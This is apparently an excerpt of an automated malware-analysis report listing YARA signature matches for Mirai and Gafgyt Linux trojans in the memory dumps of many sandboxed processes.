Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6611.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6598.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6537.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6462.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6610.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6565.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6533.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6456.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6573.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6448.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6447.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6554.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
